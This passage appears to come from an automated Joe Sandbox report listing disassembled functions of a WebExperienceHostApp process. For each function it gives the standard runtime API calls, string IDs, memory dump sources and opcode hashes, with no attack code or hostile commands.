                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB00
                                                                      • Part of subcall function 00007FFE002BBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB08
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB11
                                                                      • Part of subcall function 00007FFE002BBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB2D
                                                                    • _Maklocstr.LIBCPMT ref: 00007FFE002A46E7
                                                                    • _Maklocstr.LIBCPMT ref: 00007FFE002A46FD
                                                                    • _Getvals.LIBCPMT ref: 00007FFE002A47A2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$Getvals___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconv
                                                                    • String ID: false$true
                                                                    • API String ID: 2626534690-2658103896
                                                                    • Opcode ID: 5664b1567b62ae62c0f8fe292401d714ff7bdf959bacf5a14bd7daf587284b16
                                                                    • Instruction ID: b6fc432725b8a62035eb3119b7d3b7ef5be9cf7c89c191994f491acbc2601ee9
                                                                    • Opcode Fuzzy Hash: 5664b1567b62ae62c0f8fe292401d714ff7bdf959bacf5a14bd7daf587284b16
                                                                    • Instruction Fuzzy Hash: E0418E26B18A8299F711DF70E4401ED37B4FB98748B405226EF4D27B6AEF38D596C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: NameName::atol
                                                                    • String ID: `template-parameter$void
                                                                    • API String ID: 2130343216-4057429177
                                                                    • Opcode ID: a4afb4ade66f9edee0c19d8103b502900d10ca38c7d8001433fbf0f12611f871
                                                                    • Instruction ID: 175e206a2ccbc574c1dff00ee05ce03d33d8f172c34b194fe354c41d8ed4aefb
                                                                    • Opcode Fuzzy Hash: a4afb4ade66f9edee0c19d8103b502900d10ca38c7d8001433fbf0f12611f871
                                                                    • Instruction Fuzzy Hash: 0F414722F08E56CCFB008BA2D8542ED23B1BB68BA8F540175DE2D26B69DF7CE145C704
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+
                                                                    • String ID: char $int $long $short $unsigned
                                                                    • API String ID: 2943138195-3894466517
                                                                    • Opcode ID: f77c1a21e8a5255c030ffbae0acc1ad348c329aa0d52326646e2d78e6bd60f9e
                                                                    • Instruction ID: 7bef5f6fb8e4344b2e0b9b60c33504c1c054440b122528439227384261a07f98
                                                                    • Opcode Fuzzy Hash: f77c1a21e8a5255c030ffbae0acc1ad348c329aa0d52326646e2d78e6bd60f9e
                                                                    • Instruction Fuzzy Hash: 8A417D72E18E1ACCF7158F6AE8441BC27B1BB28764F448275CA1C62B79DF3CA505C708
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+Replicator::operator[]
                                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                    • API String ID: 1405650943-2211150622
                                                                    • Opcode ID: f28504a20d34ee970dce6c75821cee4d56fce513430e27d12ea41e2fafb3b26a
                                                                    • Instruction ID: cb7e81811399159131f72d3c01fc7615a5cf6e6baa47a9537c23e257eabde883
                                                                    • Opcode Fuzzy Hash: f28504a20d34ee970dce6c75821cee4d56fce513430e27d12ea41e2fafb3b26a
                                                                    • Instruction Fuzzy Hash: 22417E76E08F42CCF7018B6AD8402BD7BA0BB68328F5449B5CA6D26776DF7CA544C308
                                                                    APIs
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF60BD74F8E,?,?,00000000,00007FF60BD72BE4), ref: 00007FF60BD722AF
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF60BD74F8E,?,?,00000000,00007FF60BD72BE4), ref: 00007FF60BD722C1
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF60BD74F8E,?,?,00000000,00007FF60BD72BE4), ref: 00007FF60BD72300
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF60BD74F8E,?,?,00000000,00007FF60BD72BE4), ref: 00007FF60BD7230A
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF60BD74F8E,?,?,00000000,00007FF60BD72BE4), ref: 00007FF60BD7231C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                    • String ID: .dll
                                                                    • API String ID: 2665656946-2738580789
                                                                    • Opcode ID: a66b6c263dc034fa741bc5a32a4f0581ce01679e33cbc66ecdda2b758b859d84
                                                                    • Instruction ID: 68e4e8d5ca09583a38eb52af21c45c226c50a043c37aae4d811a875e59d75c84
                                                                    • Opcode Fuzzy Hash: a66b6c263dc034fa741bc5a32a4f0581ce01679e33cbc66ecdda2b758b859d84
                                                                    • Instruction Fuzzy Hash: 3C31A462B54B8195DA149B16E4041EDE361FB0DBE0F648335DE6ECB7E5EE7CD1418300
                                                                    APIs
                                                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE0028C039
                                                                    • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE0028C04C
                                                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE0028C061
                                                                    • memset.VCRUNTIME140_APP ref: 00007FFE0028C0ED
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0028C3DF
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0028C42A
                                                                      • Part of subcall function 00007FFE00291DB0: memcpy.VCRUNTIME140_APP(?,?,?,?,00000000,00007FFE0028C21C), ref: 00007FFE00291E0B
                                                                      • Part of subcall function 00007FFE00291DB0: memset.VCRUNTIME140_APP(?,?,?,?,00000000,00007FFE0028C21C), ref: 00007FFE00291E18
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnmemsetstrcspn$localeconvmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1584136638-0
                                                                    • Opcode ID: 8dafaba8b704e5f69c0de98c99f15135745e3cc4b1ac50646b6a12bab98680f1
                                                                    • Instruction ID: 80434aba1deb7338423704baa1ed744f3b8cb3cc25b6682d002d0fa16eea2c95
                                                                    • Opcode Fuzzy Hash: 8dafaba8b704e5f69c0de98c99f15135745e3cc4b1ac50646b6a12bab98680f1
                                                                    • Instruction Fuzzy Hash: 72E1A026B09A8789FB01CBB5D4442EC6B71AB98B98F644135DF4D17BAEDF38D44AC310
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Dunscale$_errno
                                                                    • String ID:
                                                                    • API String ID: 2900277114-0
                                                                    • Opcode ID: 4a9116921bccdd9ba7c2602bfe8ee50023c841c5ca163e05a24b87156944a414
                                                                    • Instruction ID: 4e506dcc8bf08a8dfdb3ab37340b8e6ffee370297dcc39cf9e8f2c0a084ede14
                                                                    • Opcode Fuzzy Hash: 4a9116921bccdd9ba7c2602bfe8ee50023c841c5ca163e05a24b87156944a414
                                                                    • Instruction Fuzzy Hash: D8A1C526D18E4B9AE711DF7484501BD2B79FF96794F504231EB0E267AADF38A0D6C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Dunscale$_errno
                                                                    • String ID:
                                                                    • API String ID: 2900277114-0
                                                                    • Opcode ID: 26d5f5b2e3ea1aa057a5f7cbe3a3d7afd4593294d0901e6a324c55da06569687
                                                                    • Instruction ID: 24b72ba3cf75e042b58d687f7b984b5b0711e0d82008e556d878ec1dfcd02b98
                                                                    • Opcode Fuzzy Hash: 26d5f5b2e3ea1aa057a5f7cbe3a3d7afd4593294d0901e6a324c55da06569687
                                                                    • Instruction Fuzzy Hash: 6DA1F332D086479AE712DE6685C00BE3B25FF99754F544735EB0A226EBEF38F4958700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: fgetc
                                                                    • String ID:
                                                                    • API String ID: 2807381905-0
                                                                    • Opcode ID: c47d75ecaef4418c9a9eda3c759bfce1d66e83964e9075376022e2f6ad13729b
                                                                    • Instruction ID: 58cc2f5839885d95409326a01776bb67b9d7736431a1945d805ab38d2b1d43e8
                                                                    • Opcode Fuzzy Hash: c47d75ecaef4418c9a9eda3c759bfce1d66e83964e9075376022e2f6ad13729b
                                                                    • Instruction Fuzzy Hash: C1819277606A42D9EB14CF65C0843AC37A1FB98B98F955232EB5D43BAADF39D494C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Xp_setn$Xp_addx$iswspaceiswxdigit
                                                                    • String ID:
                                                                    • API String ID: 3490103321-0
                                                                    • Opcode ID: ab2c1903a197715ea7e3e3c2686b46453cfce31a95e7e05e4ed8f6f14867bc67
                                                                    • Instruction ID: 11af6afc80dfe2f122ef8ed7c1e7fd5a485f5cad7f7a75f07948fdbfa7a667e3
                                                                    • Opcode Fuzzy Hash: ab2c1903a197715ea7e3e3c2686b46453cfce31a95e7e05e4ed8f6f14867bc67
                                                                    • Instruction Fuzzy Hash: 9A61B362B1C64382E6119E61E4405BEAB68FBD5744FA04532EB4E237AFDE3CE54AC700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Xp_setn$Xp_addx$iswspaceiswxdigit
                                                                    • String ID:
                                                                    • API String ID: 3490103321-0
                                                                    • Opcode ID: 39543d00ebafefd8952b4e756ae2cd2037a97f14381c482cd10f3362f5f158b2
                                                                    • Instruction ID: da91eb24bfaa8c1e9a07b94f2c273929ccc7049e4260f190c085fe4c66a3266b
                                                                    • Opcode Fuzzy Hash: 39543d00ebafefd8952b4e756ae2cd2037a97f14381c482cd10f3362f5f158b2
                                                                    • Instruction Fuzzy Hash: 5461AF22F1894386E652DE61E4806EE6B68FBC5744F500132EB4E137AFDF7CE54A8B00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 1775671525-0
                                                                    • Opcode ID: f0a2371f67f01567ff011bb773714b527b9dc57e519c18b817672b899ec6101e
                                                                    • Instruction ID: f671f65dec648e8110e1dab8ad09db11ba0fbe9abcbdf706fc718dd43921e20a
                                                                    • Opcode Fuzzy Hash: f0a2371f67f01567ff011bb773714b527b9dc57e519c18b817672b899ec6101e
                                                                    • Instruction Fuzzy Hash: 8E41E669B0564791EE18DB96E4042BD6B51EB84FE0F584632DF6D07BEADE7CE481C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                    • String ID:
                                                                    • API String ID: 3741236498-0
                                                                    • Opcode ID: c517e515e802a775e35de6fec8931573401190a97ffe2b49cc87937b1faed4ca
                                                                    • Instruction ID: a15c7b1d3a76267b9a5934f9b78145d84237ce3b77125dcb904b836f1a47a828
                                                                    • Opcode Fuzzy Hash: c517e515e802a775e35de6fec8931573401190a97ffe2b49cc87937b1faed4ca
                                                                    • Instruction Fuzzy Hash: 9531D022B19F9188EB518B27A8041AD63A4FF68FF0B6445B5DE3D133A4EE3CD442D354
                                                                    APIs
                                                                    • ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFE00285F46), ref: 00007FFE00282F09
                                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285F46), ref: 00007FFE00282F1B
                                                                    • __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFE00285F46), ref: 00007FFE00282F2A
                                                                    • __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFE00285F46), ref: 00007FFE00282F90
                                                                    • ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFE00285F46), ref: 00007FFE00282F9E
                                                                    • _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FFE00285F46), ref: 00007FFE00282FB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: __pctype_func$___lc_codepage_func___lc_locale_name_func_wcsdupcalloc
                                                                    • String ID:
                                                                    • API String ID: 490008815-0
                                                                    • Opcode ID: 7e2d64ff5f2067317982a7033377e252d5ce5b17cfc21e58bbf341ac59cb7a38
                                                                    • Instruction ID: 73f1f3dc3a3ea4699b372fb514ea0ab5cbd9958f0de1f2f8d837935ed60c2721
                                                                    • Opcode Fuzzy Hash: 7e2d64ff5f2067317982a7033377e252d5ce5b17cfc21e58bbf341ac59cb7a38
                                                                    • Instruction Fuzzy Hash: 33213D26D09F8683E7018F38C50527877A0FBA9B49F15A224CF8816327DF79E5D5C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID: (+$@R(
                                                                    • API String ID: 1294909896-3989658921
                                                                    • Opcode ID: 28282babf5ab9a79a3e9250d435ee7dac1d2215b7bc58fb2e129965c8d656ec7
                                                                    • Instruction ID: 1ab805aa85544a6dff59ecd2b4c605e8f3f5be95fd6278e3a54f542a40a400d4
                                                                    • Opcode Fuzzy Hash: 28282babf5ab9a79a3e9250d435ee7dac1d2215b7bc58fb2e129965c8d656ec7
                                                                    • Instruction Fuzzy Hash: D8F0EC31A19F1392DB449B15E99416867B5FBC8FD0F544072DB8D43B7ADFACE8A58300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: abort$CallEncodePointerTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2889003569-2084237596
                                                                    • Opcode ID: 8b97f7e3628963cc3eaf161c7556eeb719c29ae86539a23f4aa773f98f5ce27b
                                                                    • Instruction ID: 621579218dd550b7f4f4196d4dcb70bbc2076cbc3e9dfebb346d57d284db0136
                                                                    • Opcode Fuzzy Hash: 8b97f7e3628963cc3eaf161c7556eeb719c29ae86539a23f4aa773f98f5ce27b
                                                                    • Instruction Fuzzy Hash: A3918173A08B818EE711CB66E4802AD77A0F7547A8F10416AEA9D27769DF38D195CB04
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+
                                                                    • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                    • API String ID: 2943138195-757766384
                                                                    • Opcode ID: 7c6913d2299fbb63ca99d8148b6e837cf7c47692d9984bc2afced068521c9eb9
                                                                    • Instruction ID: c24757551af218586d5704ab29a9e9808a256a5173bd114da9a12bc0dae29510
                                                                    • Opcode Fuzzy Hash: 7c6913d2299fbb63ca99d8148b6e837cf7c47692d9984bc2afced068521c9eb9
                                                                    • Instruction Fuzzy Hash: 47718071A08F428CE7188F56D8501BC67A5BB287A0F8445B9DA6D77BB9DF3CE154C308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: abort$CallEncodePointerTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2889003569-2084237596
                                                                    • Opcode ID: 521ae79be483757eb474348e7632ba4031803828054df45ba905b23fe122da5c
                                                                    • Instruction ID: b2128204b9939bb718d0e5059e79e75ff56dec0e356c4483501ca7063df44ce0
                                                                    • Opcode Fuzzy Hash: 521ae79be483757eb474348e7632ba4031803828054df45ba905b23fe122da5c
                                                                    • Instruction Fuzzy Hash: 18616E76A08F458AE710CF66D0803AE77A0FB54BA8F044265EF5D27BA8CF78E055C704
                                                                    APIs
                                                                    • iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE002BBC62), ref: 00007FFE002BC63E
